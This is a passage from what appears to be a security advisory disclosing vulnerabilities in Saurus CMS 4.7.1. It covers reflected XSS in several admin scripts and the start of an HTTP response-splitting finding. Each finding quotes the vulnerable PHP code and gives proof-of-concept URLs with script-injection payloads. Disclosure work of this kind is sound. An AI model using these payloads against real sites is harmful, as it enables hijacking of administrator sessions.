$callback = (string)$_GET['callback'];
..
<?=$callback;?>("<?=str_replace(array('"', "\n", "\r"),
array('\"', '\n', '\r'), $fcontent);?>");
------------------------[ source code end ]------------------------------------
Test (parameter "file" must be valid):
http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);//
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
33. Reflected XSS in "admin/change_config.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "flt_keel" and "group"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/change_config.php" line 1220:
------------------------[ source code start ]----------------------------------
<input type=hidden name=flt_keel value="<?=$site->fdat['flt_keel']?>">
..
<input type="hidden" name="group" value="<?=$site->fdat['group']?>">
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/change_config.php?group="><script>alert(123);</script>
Result:
javascript alert boxes popping up, confirming Reflected XSS vulnerability.
###############################################################################
34. Reflected XSS in "admin/forms.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "form_id"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/forms.php" line 222:
------------------------[ source code start ]----------------------------------
if($site->fdat['op'] == 'delete' && $site->fdat['form_id']) {
..
<input type=hidden name=form_id value="<?=$site->fdat['form_id']?>">
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/forms.php?op=delete&form_id="><script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
35. Reflected XSS in "admin/lang_file.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "flt_keel" and "keel_id"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/lang_file.php" line 204:
------------------------[ source code start ]----------------------------------
$keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id];
..
<input type=hidden name=keel_id value="<?=$keel_id ?>">
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="><script>alert(123);</script>
Result:
javascript alert boxes popping up, confirming Reflected XSS vulnerability.
###############################################################################
36. Reflected XSS in "admin/select_group.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/select_group.php" line 442:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) {
if($fdat_field != 'selected_devices'){
echo '<input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'">
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/select_group.php?foobar="><script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
37. HTTP Response Splitting and insecure redirection in "redirect.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2
Php script "redirect.php" line 100:
------------------------[ source code start ]----------------------------------
if($_GET['url'])[br /